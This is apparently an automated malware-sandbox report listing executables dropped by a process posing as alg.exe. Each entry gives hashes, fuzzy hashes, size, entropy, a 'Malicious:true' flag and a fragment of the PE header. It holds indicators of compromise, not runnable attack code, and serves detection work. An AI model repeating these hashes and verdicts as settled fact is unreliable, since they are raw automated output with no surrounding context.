                                                                                                                                                SHA-256:AB6148DBFCF97208351857F2D2B6DFB595BFB608EB4C58DDC4E8BB5E257E0AF2
                                                                                                                                                SHA-512:86A91CCD454F5B011EA221F9E5AC4BDCE446ACA9E296669AEB7E5ABD979DDCB3AC882BAF720E7225E0615A0093417AA74A9CC28B67FED3CF0FCDE73819AD7AA3
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4151808
                                                                                                                                                Entropy (8bit):6.499799704060049
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:KtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755NDmg27RN:KjEIa4HIEWOc57D527BWG
                                                                                                                                                MD5:66964FBD51DA35ACD9221038C2C983AF
                                                                                                                                                SHA1:BBC7476DC9D57A321B62AD36143C509BC9E521A8
                                                                                                                                                SHA-256:946656A18B63865E325F7698C80C61EBD4459942F28D43BE92E6596AAB6E3A80
                                                                                                                                                SHA-512:CD2366713EE97F35A6BF392224D9F68AACAB4EB7939E241DBAD3B0E294298309EE4C6BAE3C9412C79AEC3B6C3E89D9FB103F86D7BA01406D20D2BD5E8D12A2F9
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):59941376
                                                                                                                                                Entropy (8bit):7.999367324974561
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:1572864:rQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:cXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                MD5:D07B6B95DD04008F76201663D887C465
                                                                                                                                                SHA1:A4A26D4764ACCD953E7227172840C2E3E2B36D16
                                                                                                                                                SHA-256:0C4C8C93C6BD1B1D5D9DB1E4DD1CE76208DE4A13E2AC1374D17BBC0D0CFFF381
                                                                                                                                                SHA-512:12685376A7707A336077FA1172291C03F1E447B60C27B09006F1456E3CF91F4E0619D29CE29C3247E8BD2E8C955FA78BCF74425026BDCF7F97BF47615350CF44
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1230336
                                                                                                                                                Entropy (8bit):5.185608649783263
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:7ejVWYUA0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:SjkY70sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:91213D4E196AA13B125F1A861DE4745D
                                                                                                                                                SHA1:F07A05A7DA2A5AA77A95807131FDFCEBC23112C5
                                                                                                                                                SHA-256:E11DD9DE4B063B93F3E2418111D9783FEE09C8D993D3ADB4B8AC67A629769A26
                                                                                                                                                SHA-512:7AA53706A831487A8F996093DDE88FD9CA99170A70925B2AFA8F5814D909BE41638ED8B2EFA7913AE75E838A75EDAF9C5E7DD919BC7512E05C956F2EB81A864F
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.................................Ye.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1384960
                                                                                                                                                Entropy (8bit):5.37782662458973
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:RxwSJhkrmZsYsqjnhMgeiCl7G0nehbGZpbD:Ry+krKsEDmg27RnWGj
                                                                                                                                                MD5:9E7544F54D447E26CCFA3C36B94F8E97
                                                                                                                                                SHA1:922131915BD7FAEDB0C1BD12DB95CDCB3F7D716E
                                                                                                                                                SHA-256:68CB66AC1FF8F7698FA993A3174C88F457A3302A4FBFE78EDD04EDE3531A23B1
                                                                                                                                                SHA-512:A55D109301A899B61E80B3AB4A05E9E85CA533350FED38BFB005184BC053F1289023350934242D80DBD956D3D6FE005DDD9636BB9EE5F1CD600DB1C0B00BD679
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.......................................... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1649152
                                                                                                                                                Entropy (8bit):5.6327482228671615
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:jHQJLIRgvsnNlsqjnhMgeiCl7G0nehbGZpbD:jHQJL34ZDmg27RnWGj
                                                                                                                                                MD5:288D9DA3A07AC18E2CFF6071869692C5
                                                                                                                                                SHA1:A9484C83016A6B83545A50BFD64F4FFC269D7EC5
                                                                                                                                                SHA-256:E70D86747FF3F5D2CD0617F37E0FAFE902E866429A8E68B2143D0F3E7E1A21C6
                                                                                                                                                SHA-512:0B582222FC50FA2FCF76A255947548B78A761762E84A912A31BE7E8074DC5A68F0CA11A65A46A2E4BCEB25DCE0055B673115ED02D8E110FEA0B587984DE1E5B5
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@.......................................... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5365760
                                                                                                                                                Entropy (8bit):6.450979591983663
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:wUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1ks:DWmXL6DEC7dRpKuDQbgiD527BWG
                                                                                                                                                MD5:84E668C37CAD335E6D98DE8ED8B8B8F2
                                                                                                                                                SHA1:190FAF0D716FB923A85939EB0B984B32731B662E
                                                                                                                                                SHA-256:DBBE8EF824E57AEE9B3FF51C7EFBD045C06E9BA492E9DBA775CBC7876A90D54C
                                                                                                                                                SHA-512:F71B460117DBE306C966F2CF56F81685C1001A31025EDFACE8FFFF7B16935F0A4045066E7DE73D3FD4C7BEA8FC1DAAA0FB9999DD5C6B9DBF95E971BDDB92107F
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3163136
                                                                                                                                                Entropy (8bit):7.972781258094414
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:nrZ23AbsK6Ro022JjL2WEiVqJZtD527BWG:rJADmmxL2WEoCZtVQBWG
                                                                                                                                                MD5:23EC8F57F59E0BF3BF16E96B32E4B089
                                                                                                                                                SHA1:8F0E20ECA6C4C069A5D19602D6CE3BDA44614588
                                                                                                                                                SHA-256:580C34D9D244F2ABAC1AB0E444CA8F27D7222D6BC96F10ED1F55431DDA5BCD76
                                                                                                                                                SHA-512:DED054B0154FA2861E0A5DC67CEAC220A9FF8AC2E9873C772E6B29CB8B47A54E9AE1E0E3E52232275BFC6729E98CE1D4CD39D4248ACAA26293909580E57FE0A5
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1......0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1213440
                                                                                                                                                Entropy (8bit):7.204939327309472
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:VfrYY42wd7hlOw9fpkEE64IsqjnhMgeiCl7G0nehbGZpbD:Yz9xrS0Dmg27RnWGj
                                                                                                                                                MD5:8203AEBDB44532FD295DCD1C9FEF84CD
                                                                                                                                                SHA1:0CC5A2FA7C719CA0D518F96FA03F439910339C75
                                                                                                                                                SHA-256:6A60524D469100D9E47E07EF76F315315B75D75304F2DED340A03697FB6DF950
                                                                                                                                                SHA-512:1C2AAE09C4507E9C1ACECB54F51534A976684628EC52837F2FA0406C17D3A9CFCEFB724751445E607551528A8119F107C7AB0AD1C057AD4359D9199ACE98266D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1388544
                                                                                                                                                Entropy (8bit):5.272952041200724
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:XwkNKiZ+R2GGNUbTF5nXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:XzNKUE5nsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:48348962BAB9715BDF7BCA65A5DF8335
                                                                                                                                                SHA1:7F8A9FF72B0721176A7075D40A3B815945806CF4
                                                                                                                                                SHA-256:3B790FC0CD45FA22020534A0C931388094E6E25DAFC840892DB557B43DE46205
                                                                                                                                                SHA-512:44956B892A97BD0F6003154C393870879C791C3B6259937D1EC764091A3F2420CF810D17E187BEADD76FF6376A97C028A0E3EE46EC79D7B5CF1520D94C90253E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P......a..... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5855744
                                                                                                                                                Entropy (8bit):6.574337433539904
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:4ALuzDKnxCp3JKNrPJzruaI6HMaJTtGbmD527BWG:DaGg3cFPIaI6HMaJTtGbmVQBWG
                                                                                                                                                MD5:86DD2C2596E94D99EA4F914ECA3BEB2E
                                                                                                                                                SHA1:1F41D94C9FDBBBF57C5F6FDFC4A74E814D2DB297
                                                                                                                                                SHA-256:FFDF417CEFC1B3857D0F353F395A9CF8F526E6305D53E2939D68641D7F4FBC8C
                                                                                                                                                SHA-512:5B434A36391DE84C52E7251BC7B9C9E0043FE78E54C96024244E16B751C90298E5BA62EE4EA4E8D99C7589B645713B9EDFE2C05EE3E6328F4CEE8FF295526600
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y......=Z... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1312768
                                                                                                                                                Entropy (8bit):5.356073582048154
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:SXr/SVMxWssqjnhMgeiCl7G0nehbGZpbD:K1xtDmg27RnWGj
                                                                                                                                                MD5:84CAB97774BA47A1B2ACDDB4B7F3887E
                                                                                                                                                SHA1:DDA8E9C4EE1470EFE7544AC3F8B1374EE31CFF11
                                                                                                                                                SHA-256:BCB30E6C0A3B59E6622196ED2E345952D9312AC0BDEC39382E93BA07D964C37B
                                                                                                                                                SHA-512:E6A196F1A5FFE031DB5879C44F2BCC7EDC9E837E3126EF21CE043AC4E566F657BC783C03B3C8CED3D5A9172559A21389E17313526482644933A92F9F732EDDDD
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P.......2........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):27533312
                                                                                                                                                Entropy (8bit):6.248637468991982
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:ZhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOyVQBWG:ZhRCpGpMJMrbp8JjpNdNlc5CB
                                                                                                                                                MD5:F8257C7A33203E87EDEC9770001CA94B
                                                                                                                                                SHA1:8C4AC04984437932D1927B92FB0500DEE3EC4E36
                                                                                                                                                SHA-256:EC07CF50C031EFC5940BAE27F8FD0BB581AB5815378351FDEC2E86AF405DE3DD
                                                                                                                                                SHA-512:6A2EB107D6A25B24F777CFA8E82133669B990D520BB5EDB24DE52E97EF1A6D8E771134A05D7F0A2BF136EEB6566D6FA54BCF384386CE09ACAD8C1DA13386F5FC
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2199552
                                                                                                                                                Entropy (8bit):6.7890281166871045
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:v83pZ3kd0CuEeN0LUmRXzYs65maDmg27RnWGj:3KuUQY15pD527BWG
                                                                                                                                                MD5:B773751366A73FC688FC4F1D5B413680
                                                                                                                                                SHA1:4B5C5CD3D62DE5E2029063A2082D0A33B26717EF
                                                                                                                                                SHA-256:44A31541079853DC972DD4840EA7D568630FBF83F889DD9F8CE092E3B5506BFB
                                                                                                                                                SHA-512:D3BCCA447892129A30B9659ADE90272631B7A7C7B21EDCF163A13C9801C451734DAFD6E15AE8E31E1E188D111F796869B969EA7A7AC6EE86DB04F4E4AAD324E1
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......!... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4971008
                                                                                                                                                Entropy (8bit):6.670841207145855
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:2Erw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MZ:oA4oGlcR+glEdOPKzgVZ4D527BWG
                                                                                                                                                MD5:87FC6350D8215CD1303BDD5B0B6D6638
                                                                                                                                                SHA1:50FFA0F8B4A97B8066C99AEC746AB40131A819C7
                                                                                                                                                SHA-256:CDEB33B9C48C6EAD81657CFB20371596351D9DD56FB11128E4C221846656777C
                                                                                                                                                SHA-512:56E58840B3C646E74E5318ADBBD1C29AC737108A2FC5B628AB0E0C9889209E052DCFD98B88B8C13CACD2FB056381F9CFF8F36F0FED29EDB5A2CEC9A2F87A4B11
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.....GuL... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4897792
                                                                                                                                                Entropy (8bit):6.829775770838265
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:X8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgK6:mv2gM+qwXLg7pPgw/DSZHqD527BWG
                                                                                                                                                MD5:BC448FFEF3FEBCCC4500445186100CEC
                                                                                                                                                SHA1:7CE7B3B8820977AC707ED13A999357BD32A04A0C
                                                                                                                                                SHA-256:B7EBE1F61CB1899EE5D951B4BF58058D9BE4B8F5F728430FF0ED0AF7B9F86E8D
                                                                                                                                                SHA-512:8ACFC7B5C969D4295561F7C9D9DFADD0E568D6E8D6156D64EBCA633E980B7FC85A1E4EB659D86A49E9CB2874FF230C4F957224D192BC712E5B7C6EC94D06C977
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4897792
                                                                                                                                                Entropy (8bit):6.829774012050522
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:/8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgK6:Ov2gM+qwXLg7pPgw/DSZHqD527BWG
                                                                                                                                                MD5:467DBD53BCC8B2AD5F9A8529C056D979
                                                                                                                                                SHA1:B4785151FC0A0A2F379AF30728B2B0A5992FAF2B
                                                                                                                                                SHA-256:DA340CEBC178300A97902ED86C8177241E7F513B5AC7EF22EFCF563A34E28221
                                                                                                                                                SHA-512:6770D04ACFB3F8422A04BCDDCEDE02C6FE28EA57A55A94E1D56B542D95F8DF3764A2736FB35943F74CCD52EA424270354023099AFF1651D8683FC0001A9B6E02
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....8.K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2156544
                                                                                                                                                Entropy (8bit):6.953594192224767
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:4tjqL8fH+8aUbp8D/8+xyWAtsqjnhMgeiCl7G0nehbGZpbD:0jKK+81FI/8zHDmg27RnWGj
                                                                                                                                                MD5:902733A891C7CA18F1987FDF39D362C4
                                                                                                                                                SHA1:533581AEC13C8C1FA93E247E579736C48FDE12B8
                                                                                                                                                SHA-256:DFD3A57FBA5FE28E3C608DCBB494BA6780CEBECF348DADA5FD11F0E3BAE8C101
                                                                                                                                                SHA-512:0A3F9F79A00602E1DCE8642E0981E5DE9730CDADCE58C69A94328E47DCBADE264B0B3C9F227C8C1002E784B45B43D0FD98F040D034981785ECE022066979128F
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......'!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2370560
                                                                                                                                                Entropy (8bit):7.03240732510139
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:OAMsOu3JfCIGnZuTodRFYKBrFDbWphDmg27RnWGj:OAMa38ZuTS4D527BWG
                                                                                                                                                MD5:FF8BB2838569EC3B48228B14FDD77FA5
                                                                                                                                                SHA1:393B69AEF1F6BD059B2431613811E3960F96376A
                                                                                                                                                SHA-256:7E547ED54AB013A139FA8116E68032AA9A2C53F854B2E971E19501861AC9FF18
                                                                                                                                                SHA-512:A6E87AB3070235F49CFB605BB5C930B128F7628983B2F3DDE55702825187A77B4550CF31129B0189F53877D17D9EFD275B36E5A93BD85E737332DB5A94D8BBA1
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%......&%... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1984512
                                                                                                                                                Entropy (8bit):7.104351504833686
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:gwbK7tnhD4aH6wD2Krx5NgOOagQE8JZsqjnhMgeiCl7G0nehbGZpbD:gSK7Fhslq2EPfOGEkDmg27RnWGj
                                                                                                                                                MD5:E1004DD0B7AEE52F020F9869D1331BA4
                                                                                                                                                SHA1:50F9C0DD87AA1F852FEE3146F0EF0B437DE75D5D
                                                                                                                                                SHA-256:8177C7B7B585077A67924843DCE510B6F7A6E690C893C43C063BC87DCB2805BD
                                                                                                                                                SHA-512:CA56F4B91135C42F5CE5D6C64B25AEFC52DF3832C19D6CB9236C3CC5E14693FD479807FACFBB442BBB5087A73583C4DEDD468B2BB7DB685D589937845C863E40
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1779712
                                                                                                                                                Entropy (8bit):7.158082935196321
                                                                                                                                                Encrypted:false
